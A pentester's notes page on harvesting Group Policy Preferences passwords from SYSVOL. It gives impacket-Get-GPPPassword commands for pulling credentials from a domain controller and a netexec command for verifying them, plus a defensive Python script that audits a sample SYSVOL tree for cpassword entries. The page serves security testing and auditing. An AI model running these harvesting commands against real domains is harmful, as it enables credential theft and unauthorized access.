yuyudhn's notes
Group Policy Preferences

Finding Passwords in SYSVOL & Exploiting Group Policy Preferences


Last updated 11 months ago


There are already a number of articles that discuss this topic; some of them are linked at the end of this page.

The quickest way to hunt for credentials in GPP is with impacket-Get-GPPPassword.

# with a NULL session
impacket-Get-GPPPassword -no-pass 'DOMAIN_CONTROLLER'
# with cleartext credentials
impacket-Get-GPPPassword 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'
cPassword

You can then verify the credentials using NetExec or Evil-WinRM.

netexec smb TARGET -u 'username' -p 'password'
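
From the defender's side, the same exposure can be audited on a copy of SYSVOL. The script below is an added example, not part of the original notes or of impacket: it walks a directory tree and reports every Group Policy Preferences XML element that still carries a non-empty cpassword attribute, so the file can be removed and the account's password rotated. The sample tree, the account name, the placeholder GUID and the list of account attributes are constructed assumptions.

```python
import os
import tempfile
import xml.etree.ElementTree as ET

# Assumption: attributes that can name the account a GPP item configures.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")

def find_cpassword_entries(root_dir):
    """Return one finding per XML element carrying a non-empty cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in sorted(files):
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except (ET.ParseError, OSError):
                continue  # malformed or unreadable file, nothing to report
            parent_of = {c: p for p in tree.iter() for c in p}
            for elem in tree.iter():
                if not elem.get("cpassword"):
                    continue  # attribute absent or empty
                account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
                parent = parent_of.get(elem)
                changed = parent.get("changed", "") if parent is not None else ""
                # The cpassword value itself is deliberately not reported.
                findings.append({"file": path, "account": account, "changed": changed})
    return findings

def build_sample_tree():
    """Write a constructed SYSVOL-like tree (placeholder values) to a temp dir."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "Policies", "{CONSTRUCTED-GUID}", "Machine", "Preferences")
    samples = {
        "Groups/Groups.xml": '<Groups><User name="svc_backup" changed="2015-02-18 01:53:01">'
                             '<Properties action="U" cpassword="CONSTRUCTED_PLACEHOLDER" '
                             'userName="svc_backup"/></User></Groups>',
        "Drives/Drives.xml": '<Drives><Drive name="S:" changed="2020-01-01 00:00:00">'
                             '<Properties action="U" cpassword="" userName=""/></Drive></Drives>',
    }
    for rel, xml_text in samples.items():
        path = os.path.join(base, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(xml_text)
    return root

if __name__ == "__main__":
    for f in find_cpassword_entries(build_sample_tree()):
        print(f"{f['file']}: account={f['account']!r} changed={f['changed']}")
```
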
https://adsecurity.org/?p=2288
https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/